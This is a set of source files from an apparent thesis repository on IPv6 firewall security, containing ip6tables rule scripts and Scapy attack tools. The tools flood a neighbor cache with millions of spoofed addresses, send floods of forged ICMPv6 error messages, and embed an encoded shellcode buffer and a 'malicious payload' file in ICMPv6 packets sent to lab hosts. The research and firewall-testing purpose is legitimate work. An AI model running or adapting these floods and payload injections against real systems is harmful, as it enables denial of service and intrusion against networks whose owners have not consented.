du.execDestUnreachNoRouteToDestWin(self.iface)\n elif re.match('execDestUnreachNoRouteLinux', 
command):\n du = DestinationUnreach()\n du.execDestUnreachNoRouteToDestLinux(self.iface)\n elif re.match('execDestUnreachAdrUnreachWin', command):\n du = DestinationUnreach()\n du.execDestUnreachAdrUnreachWin(self.iface)\n elif re.match('execDestUnreachAdrUnreachLinux', command):\n du = DestinationUnreach()\n du.execDestUnreachAdrUnreachLinux(self.iface)\n elif re.match('execDestUnreachPortUnreachWin', command):\n du = DestinationUnreach()\n du.execDestUnreachPortUnreachWin(self.iface)\n elif re.match('execDestUnreachPortUnreachLinux', command):\n du = DestinationUnreach()\n du.execDestUnreachPortUnreachLinux(self.iface)\n elif re.match('execDestUnreachComAdminProhibWin', command):\n du = DestinationUnreach()\n du.execDestUnreachCommDstAdminProhibitedWin(self.iface)\n elif re.match('execDestUnreachComAdminProhibLinux', command):\n du = DestinationUnreach()\n du.execDestUnreachCommDstAdminProhibitedLinux(self.iface)\n elif re.match('execDestUnreachBeyondScopeWin', command):\n du = DestinationUnreach()\n du.execDestUnreachBeyondScopeSrcAdrWin(self.iface)\n elif re.match('execDestUnreachBeyondScopeLinux', command):\n du = DestinationUnreach()\n du.execDestUnreachBeyondScopeSrcAdrLinux(self.iface)\n elif re.match('execDestUnreachSrcFailedPolicyWin', command):\n du = DestinationUnreach()\n du.execDestUnreachSrcFailedPolicyWin(self.iface)\n elif re.match('execDestUnreachSrcFailedPolicyLinux', command):\n du = DestinationUnreach()\n du.execDestUnreachSrcFailedPolicyLinux(self.iface)\n elif re.match('execDestUnreachRejectRouteWin', command):\n du = DestinationUnreach()\n du.execDestUnreachRejectRouteWin(self.iface)\n elif re.match('execDestUnreachRejectRouteLinux', command):\n du = DestinationUnreach()\n du.execDestUnreachRejectRouteLinux(self.iface)\n elif re.match('execPacketTooBigMTUBigWin', command):\n ptb = PacketTooBig()\n ptb.execModulePacketTooBigMTUBigWin(self.iface)\n elif re.match('execPacketTooBigMTUBigLinux', command):\n ptb = PacketTooBig()\n ptb.execModulePacketTooBigMTUBigLinux(self.iface)\n elif re.match('execPacketTooBigMTUSmallWin', command):\n ptb = PacketTooBig()\n ptb.execModulePacketTooBigMTUSmallWin(self.iface)\n elif re.match('execPacketTooBigMTUSmallLinux', command):\n ptb = PacketTooBig()\n ptb.execModulePacketTooBigMTUSmallLinux(self.iface)\n elif re.match('execPacketTooBigMTUWin', command):\n ptb = PacketTooBig()\n ptb.execModulePacketTooBigMTUWin(self.iface)\n elif re.match('execPacketTooBigMTULinux', command):\n ptb = PacketTooBig()\n ptb.execModulePacketTooBigMTULinux(self.iface)\n elif re.match('execPacketTooBigBadCodeWin', command):\n ptb = PacketTooBig()\n ptb.execModulePacketTooBigMTUWin(self.iface)\n elif re.match('execPacketTooBigBadCodeLinux', command):\n ptb = PacketTooBig()\n ptb.execModulePacketTooBigMTULinux(self.iface)\n elif re.match('execTimeExceededBadCodeWin', command):\n te = TimeExceeded()\n te.execModuleTimeExceededBadCodeWin(self.iface)\n elif re.match('execTimeExceededBadCodeLinux', command):\n te = TimeExceeded()\n te.execModuleTimeExceededBadCodeLinux(self.iface)\n elif re.match('execTimeExceededHopLimitWin', command):\n te = TimeExceeded()\n te.execModuleTimeExceededHopLimitWin(self.iface)\n elif re.match('execTimeExceededHopLimitLinux', command):\n te = TimeExceeded()\n te.execModuleTimeExceededHopLimitLinux(self.iface)\n elif re.match('execTimeExceededFragmentReassemblyWin', command):\n te = TimeExceeded()\n te.execModuleTimeExceededFragmentReassemblyWin(self.iface)\n elif re.match('execTimeExceededFragmentReassemblyLinux', command):\n te = 
TimeExceeded()\n                te.execModuleTimeExceededFragmentReassemblyLinux(self.iface)\n            elif re.match('execTimeExceededLengthWin', command):\n                te = TimeExceeded()\n                te.execModuleTimeExceededLengthWin(self.iface)\n            elif re.match('execTimeExceededLengthLinux', command):\n                te = TimeExceeded()\n                te.execModuleTimeExceededLengthLinux(self.iface)\n            elif re.match('execParameterProblemBadCodeWin', command):\n                pp = ParameterProblem()\n                pp.execModuleParameterProblemBadCodeWin(self.iface)\n            elif re.match('execParameterProblemBadCodeLinux', command):\n                pp = ParameterProblem()\n                pp.execModuleParameterProblemBadCodeLinux(self.iface)\n            elif re.match('execParameterProblemFloodPointerWin', command):\n                pp = ParameterProblem()\n                pp.execModuleParameterProblemFloodPointerWin(self.iface)\n            elif re.match('execParameterProblemFloodPointerLinux', command):\n                pp = ParameterProblem()\n                pp.execModuleParameterProblemFloodPointerLinux(self.iface)\n            elif re.match('execParameterProblemFloodHighPointerWin', command):\n                pp = ParameterProblem()\n                pp.execModuleParameterProblemFloodHighPointerWin(self.iface)\n            elif re.match('execParameterProblemFloodHighPointerLinux', command):\n                pp = ParameterProblem()\n                pp.execModuleParameterProblemFloodHighPointerLinux(self.iface)\n            elif re.match('execParameterProblemErrHeaderWin', command):\n                pp = ParameterProblem()\n                pp.execModuleParameterProblemErrHeaderWin(self.iface)\n            elif re.match('execParameterProblemErrHeaderLinux', command):\n                pp = ParameterProblem()\n                pp.execModuleParameterProblemErrHeaderLinux(self.iface)\n            elif re.match('execParameterProblemUnrecHeaderWin', command):\n                pp = ParameterProblem()\n                pp.execModuleParameterProblemUnrecHeaderWin(self.iface)\n            elif re.match('execParameterProblemUnrecHeaderLinux', command):\n                pp = ParameterProblem()\n                pp.execModuleParameterProblemUnrecHeaderLinux(self.iface)\n            elif re.match('execParameterProblemUnrecIPOptionWin', command):\n                pp = ParameterProblem()\n                pp.execModuleParameterProblemUnrecIPOptionWin(self.iface)\n            elif re.match('execParameterProblemUnrecIPOptionLinux', command):\n                pp = ParameterProblem()\n                pp.execModuleParameterProblemUnrecIPOptionLinux(self.iface)\n            elif re.match('execEchoRequestNeighCacheExhaustionDstVictimWin', command):\n                er = EchoRequest()\n                er.execModuleEchoRequestNeighCacheExhaustionDstVictimWin(self.iface)\n            elif re.match('execEchoRequestNeighCacheExhaustionDstVictimLinux', command):\n                er = EchoRequest()\n                er.execModuleEchoRequestNeighCacheExhaustionDstVictimLinux(self.iface)\n            elif re.match('execEchoRequestNeighCacheExhaustionSrcVictimWin', command):\n                er = EchoRequest()\n                er.execModuleEchoRequestNeighCacheExhaustionSrcVictimWin(self.iface)\n            elif re.match('execEchoRequestNeighCacheExhaustionSrcVictimLinux', command):\n                er = EchoRequest()\n                er.execModuleEchoRequestNeighCacheExhaustionSrcVictimLinux(self.iface)\n            elif re.match('execEchoReplyRemoteLinux', command):\n                er = EchoReply()\n                er.execModuleEchoReplyLinux(self.iface)\n    \n    def showHelp(self):\n        for entry in Help.getInfoAndErrorAttacksHelp():\n            print entry\n\n" }, { "alpha_fraction": 0.7400000095367432, "alphanum_fraction": 0.7733333110809326, "avg_line_length": 18.75, "blob_id": "53f2cb67c95c6af4021f962bd25800a7cafd3052", "content_id": "0f0e8414f5500f0425cfa8deff2db598ef7fa276", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 300, "license_type": "no_license", "max_line_length": 40, "num_lines": 16, 
"path": "/thesis/files/firewall_open_rules.sh", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n#flush iptables\nip6tables -F\n\n#activate forwarding\nsysctl -w net/ipv6/conf/all/forwarding=1\n\n#default policy\nip6tables -P INPUT ACCEPT\nip6tables -P FORWARD ACCEPT\nip6tables -P OUTPUT ACCEPT\n\n#forwarding chain\nip6tables -A FORWARD -i eth0 -j ACCEPT\nip6tables -A FORWARD -i eth1 -j ACCEPT\n" }, { "alpha_fraction": 0.5662136673927307, "alphanum_fraction": 0.6408206820487976, "avg_line_length": 47.11538314819336, "blob_id": "b0c156116bab97bbb048e4eb16a9907fb390ac24", "content_id": "478c44e2fd80c5e950baeef7d8049688a785e510", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3753, "license_type": "no_license", "max_line_length": 122, "num_lines": 78, "path": "/python/code/NSAttacks.py~", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom scapy.all import *\n\n\n\"\"\"\nthe class build NS messages\n\"\"\"\nclass NS:\n \n def __init__(self):\n #TODO: PROBLEM WITH STATIC FIREWALL ADR (ASA IS DIFFERENT)\n self.linux = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\n self.linuxMac = \"08:00:27:84:bb:37\"\n self.linuxSolicitedMulti = \"ff02::1:ff84:bb37\"\n self.win = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\n self.winMac = \"08:00:27:82:a6:ec\"\n self.winSolicitedMulti = \"ff02::1:ff47:fd83\"\n self.firewallMac = \"08:00:27:b1:da:41\"\n print 'Neighbor Solicitation'\n\n\n #TODO: VERIFY SRC 0::0\n def buildPacketInternalCacheFlooding(self, mac, srcGlobalUni, ipAdr):\n sourceLinkLayer = ICMPv6NDOptSrcLLAddr(lladdr=mac)\n return Ether(src=mac)/IPv6(dst=ipAdr,src=\"0::0\")/ICMPv6ND_NS(tgt=srcGlobalUni)/sourceLinkLayer\n\n def buildPacketInternalSelfSolicitation(self, srcMac, srcIpAdr, solicitedMulti):\n sourceLinkLayer = ICMPv6NDOptSrcLLAddr(lladdr=self.firewallMac)\n return Ether(src=srcMac)/IPv6(dst=solicitedMulti,src=srcIpAdr)/ICMPv6ND_NS(tgt=srcIpAdr)/sourceLinkLayer\n\n def buildPacketRemoteLinuxSelfSolicitation(self):\n sourceLinkLayer = ICMPv6NDOptSrcLLAddr(lladdr=self.firewallMac)\n return Ether(src=self.firewallMac)/IPv6(dst=self.linux,src=self.linux)/ICMPv6ND_NS(tgt=self.linux)/sourceLinkLayer\n\n #interface to Internal Tests\n\n def execModuleInternalCacheFloodingWin(self, exitIface):\n start = 0x000001\n end = 0xfffffe\n for t in xrange(start, end):\n hex24 = '{:06x}'.format(t)\n mac = \"08:00:27:\" + hex24[:2] + \":\" + hex24[2:4] + \":\" + hex24[4:6]\n #solicitedEtherMulti = \"33:33:ff:\" + hex24[:2] + \":\" + hex24[2:4] + \":\" + hex24[4:6]\n globalUni = \"2001:abcd:acad:2::\" + hex24[:2] + \":\" + hex24[2:4] + \":\" + hex24[4:6]\n #allnodes = \"ff02::1\"\n #solicitedIPv6 = \"ff02::1:ff:\" + hex24[:2] + \":\" + hex24[2:4] + \":\" + hex24[4:6]\n packetContainer = self.buildPacketInternalCacheFlooding(mac, globalUni, self.win)\n sendp(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleInternalCacheFloodingLinux(self, exitIface):\n start = 0x000001\n end = 0xfffffe\n for t in xrange(start, end):\n hex24 = '{:06x}'.format(t)\n mac = \"08:00:27:\" + hex24[:2] + \":\" + hex24[2:4] + \":\" + hex24[4:6]\n #solicitedEtherMulti = \"33:33:ff:\" + hex24[:2] + \":\" + hex24[2:4] + \":\" + hex24[4:6]\n globalUni = \"2001:abcd:acad:2::\" + hex24[:2] + \":\" + hex24[2:4] + \":\" + hex24[4:6]\n #allnodes = \"ff02::1\"\n #solicitedIPv6 = \"ff02::1:ff:\" + hex24[:2] + \":\" + hex24[2:4] + \":\" + hex24[4:6]\n packetContainer = 
self.buildPacketInternalCacheFlooding(mac, globalUni, self.linux)\n            sendp(packetContainer, iface=exitIface, verbose=False)\n\n    def execModuleInternalWinSelfSol(self, exitIface):\n        packetContainer = self.buildPacketInternalSelfSolicitation(self.winMac, self.win, self.winSolicitedMulti)\n        for t in range(1,100):\n            sendp(packetContainer, iface=exitIface, verbose=False)\n\n    def execModuleInternalLinuxSelfSol(self, exitIface):\n        packetContainer = self.buildPacketInternalSelfSolicitation(self.linuxMac, self.linux, self.linuxSolicitedMulti)\n        for t in range(1,100):\n            sendp(packetContainer, iface=exitIface, verbose=False)\n\n    #interface to external test\n    def execModuleRemoteLinuxSelfSol(self, exitIface):\n        packetContainer = self.buildPacketRemoteLinuxSelfSolicitation()\n        for t in range(1,100):\n            sendp(packetContainer, iface=exitIface, verbose=False)\n" }, { "alpha_fraction": 0.5805422663688660, "alphanum_fraction": 0.6055639386177063, "avg_line_length": 33.318519592285156, "blob_id": "17b1f667c77e5b7a245e2d47e2cbf51f2b0c47d4", "content_id": "81dcd0dc0005d1ec120b05ae9c786e94c759fe28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4637, "license_type": "no_license", "max_line_length": 81, "num_lines": 135, "path": "/python/code/allAttackingTest.py", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\nimport re, uuid\nimport os\nimport readline\nfrom pprint import pprint\nfrom commands import *\nfrom scapy.all import *\nfrom receiver import *\nfrom bitstring import *\n\n\"\"\"\nThis class is for testing all attacking channels in one run\n\"\"\"\nclass AllAttackingTests:\n\n    def __init__(self, iface):\n        self.ipAddress = '2001:db8:acad:2::2'\n        self.iface = iface\n        self.name = 'AllAttackingTests'\n        self.path = 'payloads/testElf'\n\n    def startSystem(self):\n        Commands.setAllAttackingTestHistory()\n        running = 1\n        while running:\n            readline.parse_and_bind(\"tab: complete\")\n            #we receive data from the keyboard \n            command = raw_input(self.name + ' >>')\n            #help command\n            if re.match('help', command):\n                self.showHelp()\n            #quit module command\n            elif re.match('quit', command):\n                running = 0\n                Commands.setCovertChannelHistory()\n            elif re.match('setAdr', command):\n                self.ipAddress = re.sub('setAdr', ' ', command).lstrip()\n                print 'Setting IP address: ' + self.ipAddress\n            #execution of all tests\n            elif re.match('exec', command):\n                dest = DestinationUnreachableMalPayloadLinux(self.path)\n                dest.execModule(self.iface, self.ipAddress)\n                echoReq = EchoRequestMalPayloadLinux(self.path)\n                echoReq.execModule(self.iface, self.ipAddress)\n                echoReply = EchoReplyMalPayloadLinux(self.path)\n                echoReply.execModule(self.iface, self.ipAddress)\n                neighbSol = NeighborSolicitationMalPayloadLinux(self.path)\n                neighbSol.execModule(self.iface, self.ipAddress)\n    \n    def showHelp(self):\n        for entry in Help.getAllAttackingTestHelp():\n            print entry\n\n\n\"\"\"\nthe class builds destination unreachable messages with a malicious payload for linux\n\"\"\"\nclass DestinationUnreachableMalPayloadLinux:\n    \n    def __init__(self, path):\n        print 'Attacking Dest Unreach'\n        self.path = path\n        self.buf = \"\"\n        self.buf += \"\\xdd\\xc0\\xd9\\x74\\x24\\xf4\\x5a\\x31\\xc9\\xb1\\x14\\xbd\\x4b\"\n        self.buf += \"\\xa8\\x1a\\xfe\\x83\\xc2\\x04\\x31\\x6a\\x14\\x03\\x6a\\x5f\\x4a\"\n        self.buf += \"\\xef\\xcf\\x84\\xd9\\x53\\x63\\x50\\xd4\\xda\\x62\\xce\\x8e\\x84\"\n        self.buf += \"\\xa9\\x8e\\xd9\\xac\\x5a\\x8e\\xe5\\xce\\x9a\\xe6\\xe5\\xce\\x9a\"\n        self.buf += 
\"\\xe6\\x8d\\xce\\x9a\\x06\\x4e\\xa7\\x36\\xab\\x4e\\x35\\x2f\\x93\"\n self.buf += \"\\x4f\\x34\\x17\\x81\\x29\\x2e\\x66\\x9e\\xd0\\xc6\\x62\\xe0\\x95\"\n self.buf += \"\\xf6\\x19\\xfc\\xf4\\xae\\x54\\x1d\\xb5\\x0d\\x0d\\xbb\\x62\\x5f\"\n self.buf += \"\\x51\\xca\\x60\\xe9\\x5e\\x7c\\x85\\xdb\\xdf\\xf5\\x55\\x1c\\x3e\"\n\n \n def buildPacket(self, ipAdr):\n data = open(self.path.strip(), 'rb')\n self.payload = data.read()\n data.close()\n self.packetCode0 = IPv6(dst=ipAdr)/ICMPv6DestUnreach(code=0)/self.buf\n \n def execModule(self, exitIface, ipAdr):\n self.buildPacket(ipAdr)\n send(self.packetCode0, iface=exitIface, verbose=False)\n\n\n\nclass EchoRequestMalPayloadLinux:\n \n def __init__(self, path):\n print 'Attacking Echo Request'\n self.path = path\n \n def buildPacket(self, ipAdr):\n data = open(self.path.strip(), 'rb')\n self.payload = data.read()\n data.close()\n self.packet = IPv6(dst=ipAdr)/ICMPv6EchoRequest(data=self.payload)\n \n def execModule(self, exitIface, ipAdr):\n self.buildPacket(ipAdr)\n send(self.packet, iface=exitIface, verbose=False)\n \nclass EchoReplyMalPayloadLinux:\n \n def __init__(self, path):\n print 'Attacking Echo Reply'\n self.path = path\n\n def buildPacket(self, ipAdr):\n data = open(self.path.strip(), 'rb')\n self.payload = data.read()\n data.close()\n self.packet = IPv6(dst=ipAdr)/ICMPv6EchoReply(data=self.payload)\n \n def execModule(self, exitIface, ipAdr):\n self.buildPacket(ipAdr)\n send(self.packet, iface=exitIface, verbose=False)\n\n\nclass NeighborSolicitationMalPayloadLinux:\n \n def __init__(self, path):\n print 'Attacking Neighbor Solicitation'\n self.path = path\n\n def buildPacket(self, ipAdr):\n data = open(self.path.strip(), 'rb')\n self.payload = data.read()\n data.close()\n self.packet = IPv6(dst=ipAdr)/ICMPv6ND_NS()/self.payload\n \n def execModule(self, exitIface, ipAdr):\n self.buildPacket(ipAdr)\n send(self.packet, iface=exitIface, verbose=False)\n\n\n\n\n" }, { "alpha_fraction": 0.6755820512771606, "alphanum_fraction": 0.7225322127342224, "avg_line_length": 58.735633850097656, "blob_id": "9928dde49d6c379d2d0238f6255c03686b92701f", "content_id": "ac97867c6c22023f0651cb9c773a250690e45f1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5197, "license_type": "no_license", "max_line_length": 186, "num_lines": 87, "path": "/python/code/parameterProblem.py~", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom scapy.all import *\n\n\"\"\"\nthe class build Parameter Problem messages\n\"\"\"\nclass ParameterProblem:\n \n def __init__(self):\n print 'Parameter Problem'\n self.win = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\n self.linux = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\n self.attacker = \"2001:abcd:acad:1::2\"\n self.firewall = \"2001:abcd:acad:2::1\"\n\n def execModuleParameterProblemBadCodeWin(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for code in range(4, 256):\n packetContainer = IPv6(dst=self.win,src=self.firewall)/ICMPv6ParamProblem(code=code)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleParameterProblemBadCodeLinux(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for code in range(4, 256):\n packetContainer = IPv6(dst=self.linux,src=self.firewall)/ICMPv6ParamProblem(code=code)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=0)/data\n 
send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleParameterProblemFloodPointerWin(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for ptr in range(0,1024):\n packetContainer = IPv6(dst=self.win,src=self.firewall)/ICMPv6ParamProblem(code=0,ptr=ptr)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleParameterProblemFloodPointerLinux(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for ptr in range(0, 1024):\n packetContainer = IPv6(dst=self.linux,src=self.firewall)/ICMPv6ParamProblem(code=0, ptr=ptr)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleParameterProblemFloodHighPointerWin(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for ptr in range(3024000000,3024001000):\n packetContainer = IPv6(dst=self.win,src=self.firewall)/ICMPv6ParamProblem(code=0,ptr=ptr)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleParameterProblemFloodHighPointerLinux(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for ptr in range(3024000000,3024001000):\n packetContainer = IPv6(dst=self.linux,src=self.firewall)/ICMPv6ParamProblem(code=0, ptr=ptr)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleParameterProblemErrHeaderWin(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for x in range(0,500):\n packetContainer = IPv6(dst=self.win,src=self.firewall)/ICMPv6ParamProblem(code=0)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleParameterProblemErrHeaderLinux(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for ptr in range(0, 500):\n packetContainer = IPv6(dst=self.linux,src=self.firewall)/ICMPv6ParamProblem(code=0)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleParameterProblemUnrecHeaderWin(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for x in range(0,500):\n packetContainer = IPv6(dst=self.win,src=self.firewall)/ICMPv6ParamProblem(code=1)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleParameterProblemUnrecHeaderLinux(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for ptr in range(0, 500):\n packetContainer = IPv6(dst=self.linux,src=self.firewall)/ICMPv6ParamProblem(code=1)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleParameterProblemUnrecIPOptionrWin(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for x in range(0,500):\n packetContainer = IPv6(dst=self.win,src=self.firewall)/ICMPv6ParamProblem(code=2)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleParameterProblemUnrecIPOptionLinux(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for ptr in range(0, 500):\n 
packetContainer = IPv6(dst=self.linux,src=self.firewall)/ICMPv6ParamProblem(code=2)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n" }, { "alpha_fraction": 0.7055397629737854, "alphanum_fraction": 0.7431818246841431, "avg_line_length": 57.650001525878906, "blob_id": "390256b6d5d2349c57cb671a0baf7cb236d52ee6", "content_id": "abc7a73ecb840a0ee20db8156da60fa237b5da67", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 7040, "license_type": "no_license", "max_line_length": 146, "num_lines": 120, "path": "/thesis/files/firewall_rules.sh", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n#define in out variables\nINSIDEIF=eth0\nINSIDENET=2001:abcd:acad:2::1/64\nOUTSIDEIF=eth1\nOUTSIDENET=2001:abcd:acad:1::1/64\n\n#activate forwarding\nsysctl -w net/ipv6/conf/all/forwarding=1\n\n#clean all\nip6tables -F\nip6tables -X ICMPV6-TO-OUT\nip6tables -X ICMPV6-TO-IN\nip6tables -X SSH-IN\nip6tables -X SSH-OUT\nip6tables -Z\n\n#create ad hoc chains\nip6tables -N ICMPV6-TO-OUT\nip6tables -N ICMPV6-TO-IN\nip6tables -N SSH-IN\nip6tables -N SSH-OUT\n\n#default policy is to drop (whitelist approach)\nip6tables -P INPUT DROP\nip6tables -P FORWARD DROP\nip6tables -P OUTPUT DROP\n\n#loopback traffic is accepted\nip6tables -A INPUT -s ::1 -d ::1 -j ACCEPT\n\n#accept new ssh traffic on internal interface and network only\nip6tables -A INPUT -i $INSIDEIF -s $INSIDENET -p tcp --dport 22 -m state --state NEW -j ACCEPT\n#accept established and related traffic on all interfaces\nip6tables -A INPUT -p tcp --dport 22 -m state --state ESTABLISHED,RELATED -j ACCEPT\n#accept ndp messages directed to the router/firewall (this is needed because of the policy)\nip6tables -A INPUT -p icmpv6 --icmpv6-type router-advertisement -j ACCEPT\nip6tables -A INPUT -p icmpv6 --icmpv6-type neighbor-solicitation -j ACCEPT\nip6tables -A INPUT -p icmpv6 --icmpv6-type neighbor-advertisement -j ACCEPT\nip6tables -A INPUT -p icmpv6 --icmpv6-type redirect -j ACCEPT\n\n\n\n#accept ssh related and established traffic, and ns,na traffic on output chain\nip6tables -A OUTPUT -p tcp -m state --state RELATED,ESTABLISHED -j ACCEPT\nip6tables -A OUTPUT -p icmpv6 --icmpv6-type router-advertisement -j ACCEPT\nip6tables -A OUTPUT -p icmpv6 --icmpv6-type neighbor-solicitation -j ACCEPT\nip6tables -A OUTPUT -p icmpv6 --icmpv6-type neighbor-advertisement -j ACCEPT\nip6tables -A OUTPUT -j LOG --log-prefix \"output drops\"\nip6tables -A OUTPUT -j DROP\n\n#drop icmpv6 packets with link-local src/dst address in forwarding chain\nip6tables -A FORWARD -p icmpv6 -d fe80::/10 -j DROP\nip6tables -A FORWARD -p icmpv6 -s fe80::/10 -j DROP\n#drop echo reply with dst multicast address in forwarding chain\nip6tables -A FORWARD -p icmpv6 -d ff00::/8 --icmpv6-type echo-reply -j DROP\n\n#icmpv6 traffic from internal to be forwarded to external\nip6tables -A FORWARD -s $INSIDENET -d $OUTSIDENET -p icmpv6 -j ICMPV6-TO-OUT\n#ssh traffic from internal to be forwarded to external\nip6tables -A FORWARD -i $INSIDEIF -o $OUTSIDEIF -s $INSIDENET -d $OUTSIDENET -p tcp --dport 22 -m state --state NEW,ESTABLISHED,RELATED -j SSH-OUT\n\n#icmpv6 traffic from external to be forwarded to internal\nip6tables -A FORWARD -d $INSIDENET -p icmpv6 -j ICMPV6-TO-IN\n#ssh traffic from external to be forwarded to internal\nip6tables -A FORWARD -d $INSIDENET -p tcp --sport 22 -m state --state ESTABLISHED,RELATED -j 
SSH-IN\nip6tables -A FORWARD -j LOG --log-prefix \"FORWARDING DROPS\"\n\n#---------------------------------\n#forwarding rules from IN to OUT -\n#---------------------------------\n\n#accept ssh to be forwarded to external network\nip6tables -A SSH-OUT -i $INSIDEIF -o $OUTSIDEIF -s $INSIDENET -d $OUTSIDENET -p tcp --dport 22 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT\n#accept error messages\nip6tables -A ICMPV6-TO-OUT -s $INSIDENET -d $OUTSIDENET -p icmpv6 --icmpv6-type destination-unreachable -j ACCEPT\nip6tables -A ICMPV6-TO-OUT -s $INSIDENET -d $OUTSIDENET -p icmpv6 --icmpv6-type packet-too-big -j ACCEPT\nip6tables -A ICMPV6-TO-OUT -s $INSIDENET -d $OUTSIDENET -p icmpv6 --icmpv6-type time-exceeded -j ACCEPT\nip6tables -A ICMPV6-TO-OUT -s $INSIDENET -d $OUTSIDENET -p icmpv6 --icmpv6-type parameter-problem -j ACCEPT\n#echo request with rate limit\nip6tables -A ICMPV6-TO-OUT -s $INSIDENET -d $OUTSIDENET -p icmpv6 --icmpv6-type echo-request -m limit --limit 900/min -j ACCEPT\n#echo reply is dropped because of internal policy\nip6tables -A ICMPV6-TO-OUT -s $INSIDENET -d $OUTSIDENET -p icmpv6 --icmpv6-type echo-reply -j DROP\n#NDP messages only if they haven't traversed a router (this is to underline the required hop limit of 255)\nip6tables -A ICMPV6-TO-OUT -s $INSIDENET -d $OUTSIDENET -p icmpv6 --icmpv6-type router-advertisement -m hl --hl-eq 255 -j ACCEPT\nip6tables -A ICMPV6-TO-OUT -s $INSIDENET -d $OUTSIDENET -p icmpv6 --icmpv6-type neighbor-solicitation -m hl --hl-eq 255 -j ACCEPT\nip6tables -A ICMPV6-TO-OUT -s $INSIDENET -d $OUTSIDENET -p icmpv6 --icmpv6-type neighbor-advertisement -m hl --hl-eq 255 -j ACCEPT\nip6tables -A ICMPV6-TO-OUT -s $INSIDENET -d $OUTSIDENET -p icmpv6 --icmpv6-type redirect -m hl --hl-eq 255 -j ACCEPT\n#drop remaining icmpv6 packets (for clarity, but redundant because of the policy)\nip6tables -A ICMPV6-TO-OUT -s $INSIDENET -d $OUTSIDENET -p icmpv6 -j LOG --log-prefix \"Firewall IN-OUT: dropped ICMPv6\"\nip6tables -A ICMPV6-TO-OUT -s $INSIDENET -d $OUTSIDENET -p icmpv6 -j DROP\n\n#--------------------------------\n#forwarding rule from OUT to IN -\n#--------------------------------\n\n#accept established and related ssh to be forwarded to internal network\nip6tables -A SSH-IN -d $INSIDENET -p tcp --sport 22 -m state --state ESTABLISHED,RELATED -j ACCEPT\n#accept error messages ---- TODO: evaluate if it is worth to use state for error msg, and only dst addresses\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type destination-unreachable -j ACCEPT\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type packet-too-big -j ACCEPT\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type time-exceeded -j ACCEPT\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type parameter-problem -j ACCEPT\n#echo request and reply , no ping from outside (internal policy), but allow reply to come back with rate limit\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p 